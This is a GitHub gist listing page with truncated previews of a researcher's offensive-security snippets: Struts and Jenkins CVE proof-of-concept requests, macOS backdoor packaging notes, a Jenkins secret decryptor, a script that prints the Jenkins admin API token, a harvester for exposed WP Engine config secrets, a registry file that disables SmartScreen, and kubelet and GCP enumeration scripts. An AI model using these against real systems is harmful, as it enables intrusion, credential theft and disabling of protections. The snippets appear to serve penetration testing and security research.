Skip to content

Instantly share code, notes, and snippets.

Chris Gates carnal0wnage

View GitHub Profile
View CVE-2017-5638.sh
#!/bin/bash
#
# Poc
#
# ./CVE-2017-5638.sh 192.168.9.3
#
# by f0r34chb3t4 - Qui Abr 12 21:00:24 -03 2018
#
# CVE-2017-5638
# Apache Struts 2 Vulnerability Remote Code Execution
View Preparación OSCP.md
View Backdoor Notes
#Creating signed and customized backdoored macOS applications by abusing Apple Developer tools
https://medium.com/@adam.toscher/creating-signed-and-customized-backdoored-macos-applications-by-abusing-apple-developer-tools-b4cbf1a98187
Notes:
Include 1) 1Password 7.app (Gatekeeper Approved) 2) StuffIt Expander.app/Backdoor (Not Approved) in /tmp/apps. You will be allowed to run both 1) and 2) (Gatekeeper bypass)
Alternative one liner:
$ pkgbuild --root /tmp/apps --identifier com.microsoft --install-location /Applications mypackage.pkg
@carnal0wnage
carnal0wnage / decrypt.py
Created Feb 28, 2019
slightly modified https://github.com/tweksteen/jenkins-decrypt/blob/master/decrypt.py because it was throwing a bytes/string error - change is line 55
View decrypt.py
#!/usr/bin/env python3
import re
import sys
import base64
from hashlib import sha256
from binascii import hexlify, unhexlify
from Crypto.Cipher import AES
MAGIC = b"::::MAGIC::::"
@carnal0wnage
carnal0wnage / gist:fad7c95492224e609ddc47fb08ac8438
Created Feb 28, 2019
Jenkins - SECURITY-180/CVE-2015-1814 PoC
View gist:fad7c95492224e609ddc47fb08ac8438
POST /user/user2/descriptorByName/jenkins.security.ApiTokenProperty/changeToken HTTP/1.1
Host: 10.0.0.160
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://10.0.0.160:8080/asynchPeople/
@carnal0wnage
carnal0wnage / gist:1f316c01eaa7707c3cc6497ef04857a8
Last active Feb 28, 2019
Jenkins - SECURITY-200 / CVE-2015-5323 PoC
View gist:1f316c01eaa7707c3cc6497ef04857a8
//from: https://gist.github.com/hayderimran7/dec6a655ba671fa5b3c3
import jenkins.security.*
//j.jenkins.setSecurityRealm(j.createDummySecurityRealm());
User u = User.get("admin")
ApiTokenProperty t = u.getProperty(ApiTokenProperty.class)
def token = t.getApiToken()
//token.getClass()
println "token is $token "
View wpeprivate-config.sh
#!/bin/bash
# If you find a site with /_wpeprivate/config.json file exposed, run this and get all kinds of fun goodies.
# If it "no worked" (Technical Term) then you probably need to install jq!
TARGET=$1
TARGETDOMAIN=$(echo $TARGET | cut -d/ -f3)
# Pretty Colors
RESET='\033[00m'
GREEN='\033[01;32m'
View gist:ff2b86ee166f504eaac362d5dece3529
REGEDIT4
; @ECHO OFF
; CLS
; REGEDIT.EXE /S "%~f0"
; EXIT
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer]
"SmartScreenEnabled"="Off"
[HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter]
"EnabledV9"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\AppHost]
@carnal0wnage
carnal0wnage / kubelet-find.sh
Created Jan 8, 2019
bash script to open file of IPs and looks for unsecure k8 API (10250)
View kubelet-find.sh
for a in $(cat kube-gke.txt); do
echo $a;
curl --insecure https://$a:10250/runningpods ";
echo "";
echo "";
done
@carnal0wnage
carnal0wnage / gcp_enum.sh
Last active Feb 28, 2019
use the gcloud utilities to enumerate as much access as possible from a GCP service account json file. see blog post: <to insert>
View gcp_enum.sh
# gcloud auth activate-service-account --key-file=85.json
# gcloud projects list
project="my-projet"
space=""
echo "gcloud auth list"
gcloud auth list
echo -e "$space"
You can’t perform that action at this time.